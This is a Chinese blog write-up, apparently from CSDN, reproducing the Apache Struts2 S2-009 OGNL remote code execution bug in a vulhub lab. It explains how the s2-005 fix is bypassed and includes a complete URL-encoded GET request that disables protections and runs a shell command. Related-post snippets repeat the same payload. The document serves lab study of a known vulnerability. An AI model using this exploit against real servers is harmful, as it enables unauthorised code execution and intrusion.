vulhub中Struts2-009 远程代码执行漏洞复现

于 2024-04-05 16:29:46 发布
阅读量542 收藏 12
点赞数 23
分类专栏: vulhub漏洞复现 文章标签: struts apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/137402920
版权
本文详细描述了Struts2中的一个漏洞利用案例,利用OGNL表达式绕过官方对特殊字符的防御,通过Example5Action的参数传递执行任意代码。作者展示了如何在实际环境中构造Exploit并成功绕过安全措施。
摘要由CSDN通过智能技术生成

影响版本: 2.1.0 - 2.3.1.1

## 原理

> 前置阅读: 这个漏洞再次来源于s2-003、s2-005。了解该漏洞原理,需要先阅读s2-005的说明:https://github.com/phith0n/vulhub/blob/master/struts2/s2-005/README.md

参考[Struts2漏洞分析之Ognl表达式特性引发的新思路](https://www.t00ls.net/viewthread.php?tid=21197),文中说到,该引入ognl的方法不光可能出现在这个漏洞中,也可能出现在其他java应用中。

Struts2对s2-003的修复方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于`#`号,同样使用编码`\u0023`或`\43`进行绕过;于是Struts2对s2-005的修复方法是禁止`\`等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数`example`,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在`example`参数中,然后使用`/helloword.acton?example=<OGNL statement>&(example)('xxx')=1`的方法来执行它,从而绕过官方对`#`、`\`等特殊字符的防御。

Exploit构造

测试环境是一个struts2的“功能展示”网站`Struts Showcase`,代码很多,我们的目标是去找一个接受了参数,参数类型是string的action。

先对`S2-009.war`进行解压(我用binwalk,其实直接zip就可以),可见源码都在`WEB-INF/src`目录中,我一般找ajax相关的代码,这些代码一般逻辑比较简单。

找到一个`WEB-INF/src/java/org/apache/struts2/showcase/ajax/Example5Action.java`:

```java
public class Example5Action extends ActionSupport {

    private static final long serialVersionUID = 2111967621952300611L;

    private String name;
    private Integer age;


    public String getName() { return name; }
    public void setName(String name) { this.name = name; }

    public Integer getAge() { return age; }
    public void setAge(Integer age) { this.age = age; }

    @Override
    public String execute() throws Exception {
        return SUCCESS;
    }
}
```

代码没有更简单了,其接受了name参数并调用setName将其赋值给私有属性`this.name`,正是符合我们的要求。然后去`WEB-INF/src/java/struts-ajax.xml`看一下URL路由:

```xml
<package name="ajax" extends="struts-default">
    ...
    <action name="example5" class="org.apache.struts2.showcase.ajax.Example5Action">
        <result name="input">/ajax/tabbedpanel/example5.jsp</result>
        <result>/ajax/tabbedpanel/example5Ok.jsp</result>
    </action>
    ...
</package>
```

上面的这些其实都可以不看,

`name=example5`,所以访问`http://your-ip:8080/ajax/example5.action`即可访问该控制器。按照原理中说到的方法,将OGNL利用代码放在name参数里,访问该URL:

GET /ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true HTTP/1.1
Host: localhost:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

由于该POC没有回显,所以调用的是`touch /tmp/success`命令,查看/tmp目录发现已经成功:

黑盒情况下,这个洞也不是限制特别大。只要你在正常业务中找到传参的地方,就用该参数名可以试试。

余生有个小酒馆
关注
  • 23
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 728
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 的对象数据。在 Struts2 ,标签库使用 OGNL 表达式来获取对象数据,例如 `...
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)复现
JimWu的博客
09-04 1523
Apache Struts2远程代码执行漏洞(S2-009)复现 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
struts-s2-009 代码执行(CVE-2011-3923)
最新发布
m0_65150886的博客
01-08 516
但是,如果当前action接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的防。Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。控制整个网站或者服务器。
墨者Apache Struts2远程代码执行漏洞(S2-009)复现题解
zr1213159840的博客
01-15 738
一共提供了五个链接,每个都点击一下,发现第五个有点特别,点击进去,链接变成了 219.153.49.228:45832/ajax 查找漏洞相关的信息,找到一下链接: https://github.com/vulhub/vulhub/blob/master/struts2/s2-009/README.zh-cn.md 按照链接的指引,我们能找到这个下面还有个页面,访问如下地址: http://219.153.49.228:45832/ajax/example5.action 出现如下页面 接着就是找
Apache Struts2远程代码执行漏洞(S2-009)复现总结
qq_45746681的博客
10-07 593
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞成因?二、复现1.环境搭建复现 前言 记录并复现下常见的struts2漏洞,加深理解 一、漏洞成因? 在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式 当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值,也可以进一步绕过字符串限制的保护 二、复现 1.环境搭建 因为墨者学院代币
漏洞复现----31、Struts2/S2-009
七天
06-29 528
文章目录一、漏洞原理二、环境搭建三、代码解释四、漏洞复现五、修复方法 一、漏洞原理 Struts2对s2-003的修复方法是禁止静态方法调用,在s2-005可直接通过OGNL绕过该限制,对于#号,同样使用编码\u0023或\43进行绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数,然后使用/helloword.act
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性,允许远程命令...
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
Struts2之命名空间详解及JSP文件上传了解案例struts009
11-30
参考博文:http://blog.csdn.net/u011638419/article/details/41620213
Struts 2权威指南完整版009
10-10
Struts 2权威指南--基于WebWork核心的MVC开发
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
这个标题和描述提到的"struts2-scan"是一种工具,专门用来检测Struts2框架的安全漏洞Struts2漏洞通常涉及到框架的核心组件,例如OGNL(Object-Graph Navigation Language)表达式,这是一种强大的语言,允许在...
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-009)复现
weixin_42079912的博客
08-09 231
S2-009漏洞原因: OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量的恶意表达式注入进行进一步评估。 在S2-003和S2-005已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。 ParametersIntercept...
buuctf [struts2]s2-009
qq_1873822的博客
03-22 370
漏洞描述 这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 1952
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 538
Apache Struts2远程代码执行漏洞(S2-009)
浅学安全开发python POC/EXP编写(s2-009)
ddchggf的博客
07-30 1105
浅学安全开发pythonPOC/EXP编写,通过(s2-009)练手未经授权请勿利用文章的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
S2-009 远程代码执行漏洞
EC_Carrot的博客
08-07 844
漏洞简介 影响版本: 2.1.0 - 2.3.1.1 漏洞复现vulhub的环境里,example5.action页面里可以传入name参数,向该参数传入poc即可执行命令: GET /ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowSt
strtus2命令执行漏洞s2-045修复
09-01
Struts2命令执行漏洞s2-045是指Struts2框架的一个安全漏洞,攻击者可以通过特殊构造的参数来执行任意命令。 修复Struts2命令执行漏洞s2-045需要采取以下步骤: 1. 升级Struts2版本:首先需要升级到Struts2最新版本,因为漏洞是在旧版本存在的。最新版本通常会修复已知的安全漏洞,并提供其他改进。 2. 配置安全策略:在Struts2的配置文件,可以添加一些安全策略来防止命令执行漏洞的利用。可以禁用某些敏感的操作或限制特定的请求访问权限。 3. 过滤用户输入:对于用户输入的数据,应该进行有效的过滤和验证。可以使用正则表达式或特定的字符过滤函数来检查输入的合法性,避免注入恶意代码。 4. 校验URL:URL的参数也需要进行校验和过滤,以防止攻击者通过URL参数来执行恶意代码。 5. 防火墙和Web应用程序防护:在服务器上配置防火墙和Web应用程序防护系统,可以增加额外的安全层。这些系统可以检测和阻止恶意的URL请求,减少被攻击的风险。 6. 定期更新和审查:持续关注Struts2的安全公告和更新,及时升级修复已知的安全漏洞。同时,定期审查应用程序的安全配置和代码,发现并修复可能存在的漏洞。 通过以上措施,可以有效修复Struts2命令执行漏洞s2-045,提高应用程序的安全性,防止被攻击和利用。同时,建议开发人员和管理员密切关注最新的安全漏洞信息,及时采取相应的措施进行修复和防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值